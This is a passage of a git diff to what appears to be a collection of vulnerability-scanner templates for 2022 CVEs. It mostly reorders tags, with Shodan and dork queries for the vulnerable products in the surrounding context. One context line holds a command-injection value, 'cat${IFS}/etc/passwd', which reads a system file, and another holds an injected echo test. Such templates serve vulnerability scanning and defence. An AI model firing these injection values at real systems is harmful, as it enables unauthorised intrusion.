cve,cve2022,confluence,atlassian,default-login,kev + tags: cve2022,cve,confluence,atlassian,default-login,kev http: - raw: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index cb38558125..14b082de58 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -27,7 +27,7 @@ info: product: newspaper framework: wordpress publicwww-query: "/wp-content/themes/Newspaper" - tags: xss,wordpress,wp,wp-theme,newspaper,wpscan,cve,cve2022,tagdiv + tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv http: - raw: diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index cd8c24f565..34f3e7293c 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -30,7 +30,7 @@ info: vendor: plugins360 product: all-in-one_video_gallery framework: wordpress - tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery,plugins360 + tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360 http: - raw: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 7fb74091a7..8e7246c2b6 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: dotcms product: dotcms - tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive + tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive http: - raw: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index eb578d738d..80b3d463dc 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: openautomationsoftware product: oas_platform - tags: cve,cve2022,oas,oss,unauth,openautomationsoftware + tags: cve2022,cve,oas,oss,unauth,openautomationsoftware http: - raw: diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index a261d5f1cf..0b3bf33252 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: std42 product: elfinder - tags: cve,cve2022,lfi,elfinder,std42 + tags: cve2022,cve,lfi,elfinder,std42 http: - raw: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index c0fe0988af..ea1ebacc0d 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -28,7 +28,7 @@ info: vendor: kavitareader product: kavita shodan-query: title:"kavita" - tags: ssrf,kavita,authenticated,huntr,cve,cve2022,intrusive,kavitareader + tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader http: - raw: diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index be743bbba6..3f492e5094 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -28,7 +28,7 @@ info: vendor: qnap product: photo_station shodan-query: title:"QNAP" - tags: cve,cve2022,qnap,lfi,kev + tags: cve2022,cve,qnap,lfi,kev http: - method: GET diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index d3ab39476e..234c032c15 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -28,7 +28,7 @@ info: product: simple_ajax_chat framework: wordpress google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure,plugin-planet + tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet http: - method: GET diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d853510b15..0f803a07d5 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: microfinance_management_system_project product: microfinance_management_system - tags: microfinance,edb,cve,cve2022,sqli,microfinance_management_system_project + tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 5789802c07..1e2c35608b 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: event_management_system_project product: event_management_system - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms,intrusive,event_management_system_project + tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index 81e30b0674..2882c2da1d 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -28,7 +28,7 @@ info: max-request: 4 vendor: naviwebs product: navigate_cms - tags: authenticated,packetstorm,cve,cve2022,ssrf,navigate,cms,lfi,intrusive,naviwebs + tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs http: - raw: diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 6742027ed9..35a2ea94ae 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -27,7 +27,7 @@ info: vendor: welaunch product: wordpress_country_selector framework: wordpress - tags: wordpress-country-selector,wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,welaunch + tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch http: - raw: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index b08bc457d2..18361d085b 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - tags: xss,rlm,packetstorm,cve,cve2022,reprisesoftware + tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware http: - method: GET diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index dbffc53736..7de6427c41 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - tags: rlm,packetstorm,cve,cve2022,exposure,reprisesoftware + tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware http: - method: GET diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 77c0f07512..0369573d19 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -26,7 +26,7 @@ info: vendor: wpvivid product: migration\,_backup\,_staging framework: wordpress - tags: wp,wpscan,seclists,packetstorm,authenticated,cve,cve2022,lfi,wordpress,wp-plugin,wpvivid + tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid http: - raw: diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index c926af055b..f2ff382b42 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -28,7 +28,7 @@ info: vendor: dlink product: dir-816l_firmware shodan-query: http.html:"DIR-816L" - tags: cve,cve2022,dlink,exposure + tags: cve2022,cve,dlink,exposure http: - method: GET diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index ebd1391077..3ca0a240b8 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: phpgurukul product: e-diary_management_system - tags: cve,cve2022,xss,authenticated,edms,phpgurukul + tags: cve2022,cve,xss,authenticated,edms,phpgurukul http: - raw: diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 3bcd2f8c9c..04a2392e98 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: phpgurukul product: directory_management_system - tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul + tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul http: - raw: diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 643e6f8ccd..cd4ad4d959 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: phpgurukul product: cyber_cafe_management_system - tags: cve2022,sqli,auth-bypass,edb,cve,phpgurukul + tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul http: - raw: diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 0b10943bb1..afc31bd6d3 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: razer product: sila_firmware - tags: edb,packetstorm,cve,cve2022,razer,lfi,router + tags: cve,cve2022,edb,packetstorm,razer,lfi,router http: - raw: diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index b9e107dc46..cd3bf561be 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -28,7 +28,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: lfi,solarview,edb,cve,cve2022,contec + tags: cve,cve2022,lfi,solarview,edb,contec http: - method: GET diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index b4c565db92..1f297af8b0 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb + tags: cve2022,cve,xss,solarview,edb http: - method: GET diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 0cf9ca0db9..8bcf6cf5e9 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -29,7 +29,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: injection,solarview,edb,packetstorm,cve,cve2022,rce,kev,contec + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index b8b3d27d31..3cc59f18f4 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: netgear product: ssl312_firmware - tags: cve,cve2022,sqli,netgear,router + tags: cve2022,cve,sqli,netgear,router http: - raw: diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index c083da7deb..faa31725ac 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -27,7 +27,7 @@ info: max-request: 4 vendor: wbce product: wbce_cms - tags: cve,cve2022,wbcecms,xss,wbce + tags: cve2022,cve,wbcecms,xss,wbce http: - raw: diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 848b99789a..2edc24ad42 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -28,7 +28,7 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: xss,cve2022,wavlink,cve,router,iot + tags: cve,cve2022,xss,wavlink,router,iot http: - raw: diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 33237a4c22..1befde6477 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: school_dormitory_management_system_project product: school_dormitory_management_system - tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project + tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index ab4ed10718..476b191cda 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -29,7 +29,7 @@ info: vendor: zyxel product: usg_flex_100w_firmware shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: packetstorm,zyxel,cve,cve2022,firewall,unauth,kev,msf,rce + tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce http: - raw: diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 4f665fbc8b..020e0cd918 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -27,7 +27,7 @@ info: vendor: simplefilelist product: simple-file-list framework: wordpress - tags: cve,authenticated,wordpress,wp-plugin,wp,wpscan,cve2022,xss,simple-file-list,simplefilelist + tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist http: - raw: diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 04ea9627d5..d91866e763 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -30,7 +30,7 @@ info: vendor: atmail product: atmail shodan-query: http.html:"atmail" - tags: cve,cve2022,atmail,xss + tags: cve2022,cve,atmail,xss http: - method: GET diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index eda5c4e739..fc0c074195 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -29,7 +29,7 @@ info: vendor: roxy-wi product: roxy-wi shodan-query: http.html:"Roxy-WI" - tags: cve,cve2022,rce,unauth,roxy,packetstorm,roxy-wi + tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi http: - raw: diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 9be0d5cc32..487cd62e14 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -29,7 +29,7 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"Linear eMerge" - tags: cve2022,emerge,exposure,packetstorm,cve,nortekcontrol + tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol http: - method: GET diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 934fb62a7f..b1414efbf5 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -27,7 +27,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - tags: cve,cve2022,xss,solarview,contec + tags: cve2022,cve,xss,solarview,contec http: - method: GET diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 93e4c16c77..74c60da650 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -28,7 +28,7 @@ info: product: nex-forms framework: wordpress publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ - tags: wpscan,packetstorm,cve,cve2022,wordpress,sqli,wp-plugin,wp,authenticated,basixonline + tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: - raw: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index bdbef3fe68..f841d042e8 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -30,7 +30,7 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: title:"eMerge" - tags: packetstorm,cve,cve2022,emerge,rce,nortekcontrol + tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: - raw: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 65f1df65a0..c8023a8ef1 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -28,7 +28,7 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 - tags: cve,cve2022,vmware,lfi + tags: cve2022,cve,vmware,lfi http: - method: GET diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index d38c08f056..3a10983be0 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -30,7 +30,7 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"eMerge" - tags: cve2022,emerge,nortek,xss,packetstorm,cve,nortekcontrol + tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol http: - method: GET diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index cb3a5fd266..80a52751e9 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -30,7 +30,7 @@ info: vendor: netgate product: pfblockerng framework: pfsense - tags: packetstorm,cve,cve2022,pfsense,pfblockerng,rce,oast,netgate + tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate http: - raw: diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index cc143f010b..b728a7b68b 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index b91fd54e26..89901e885f 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -27,7 +27,7 @@ info: vendor: softwarepublico product: i3geo shodan-query: http.html:"i3geo" - tags: cve,cve2022,i3geo,lfi,softwarepublico + tags: cve2022,cve,i3geo,lfi,softwarepublico http: - method: GET diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index 5f96993209..c0c49d3908 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -25,7 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,xss,cve,cve2023,microweber + tags: cve,cve2022,huntr,xss,microweber http: - method: GET diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 230e81c3ae..b6108ac3d0 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -29,7 +29,7 @@ info: vendor: megatech product: msnswitch_firmware shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 - tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch,megatech + tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech http: - method: GET diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 460874eb38..214dd0a91d 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -28,7 +28,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn http: - method: GET diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index f662fa2ea0..155c3f2ff7 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -28,7 +28,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn http: - method: GET diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index e7b34e00e7..15e4f6d9cd 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -27,7 +27,7 @@ info: vendor: powertekpdus product: basic_pdu_firmware shodan-query: http.html:"Powertek" - tags: cve,cve2022,powertek,auth-bypass,powertekpdus + tags: cve2022,cve,powertek,auth-bypass,powertekpdus http: - raw: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 971a280609..66b95bbac8 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: spark shodan-query: title:"Spark Master at" - tags: cve2022,apache,spark,authenticated,kev,packetstorm,cve + tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm variables: command: "echo CVE-2022-33891 | rev" diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 5bf3586519..eeef8fe3b4 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -28,7 +28,7 @@ info: vendor: multisafepay product: multisafepay_plugin_for_woocommerce framework: wordpress - tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce + tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce http: - method: GET diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 10149a5dc3..0c5e3a5a99 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -30,7 +30,7 @@ info: product: wp_visitor_statistics framework: wordpress google-query: inurl:"/wp-content/plugins/wp-stats-manager" - tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market + tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: - raw: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 5ab0c6836e..f12d13a330 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -29,7 +29,7 @@ info: vendor: wavlink product: wn533a8_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: packetstorm,cve,cve2022,wavlink,router,exposure + tags: cve,cve2022,packetstorm,wavlink,router,exposure http: - raw: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 33b1b9a2f5..442f466ad5 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -29,7 +29,7 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - tags: cve2022,wavlink,router,exposure,packetstorm,cve + tags: cve,cve2022,wavlink,router,exposure,packetstorm http: - raw: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 317ab391c2..8422775e38 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -29,7 +29,7 @@ info: vendor: wavlink product: wn533a8_firmware shodan-query: http.html:"Wavlink" - tags: cve2022,wavlink,xss,router,edb,cve + tags: cve2022,cve,wavlink,xss,router,edb http: - raw: diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 07ce9a8517..50fc2ad744 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: softwarepublico product: i3geo - tags: cve,cve2022,i3geo,xss,softwarepublico + tags: cve2022,cve,i3geo,xss,softwarepublico http: - method: GET diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 9b551db372..81956a524e 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -28,7 +28,7 @@ info: vendor: schneider-electric product: spacelogic_c-bus_home_controller_firmware shodan-query: html:"SpaceLogic C-Bus" - tags: cve,cve2022,iot,spacelogic,rce,oast,packetstorm,schneider-electric + tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric http: - raw: diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 9aeb08cbb2..b4d46bf58b 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -28,7 +28,7 @@ info: product: wpb_show_core framework: wordpress google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project + tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 7b35992def..a984375a5b 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -29,7 +29,7 @@ info: vendor: never5 product: related_posts framework: wordpress - tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr,never5 + tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5 http: - raw: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index a2d4c2bd88..7bf8b344e5 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -28,7 +28,7 @@ info: vendor: metagauss product: profilegrid framework: wordpress - tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022,metagauss + tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss http: - raw: diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 0f17a23741..b56bf5c898 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -29,7 +29,7 @@ info: vendor: webmin product: webmin shodan-query: title:"Webmin" - tags: packetstorm,cve2022,webmin,rce,authenticated,edb,cve + tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb http: - raw: diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 8f82a7c843..96ce96a0b6 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -27,7 +27,7 @@ info: product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" zoomeye-query: app:"Hytec Inter HWL-2511-SS" - tags: cve,cve2022,hytec,rce + tags: cve2022,cve,hytec,rce http: - raw: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 6895da32f7..bafedc5e65 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -29,7 +29,7 @@ info: vendor: telosalliance product: omnia_mpx_node_firmware shodan-query: http.title:"Omnia MPX Node | Login" - tags: traversal,omnia,edb,cve,cve2022,lfi,telosalliance + tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance http: - method: GET diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 7ebf539d20..9161fa74a1 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -29,7 +29,7 @@ info: vendor: atlassian product: bitbucket shodan-query: http.component:"BitBucket" - tags: packetstorm,cve,cve2022,bitbucket,atlassian,kev + tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev variables: data: '{{rand_base(5)}}' diff --git 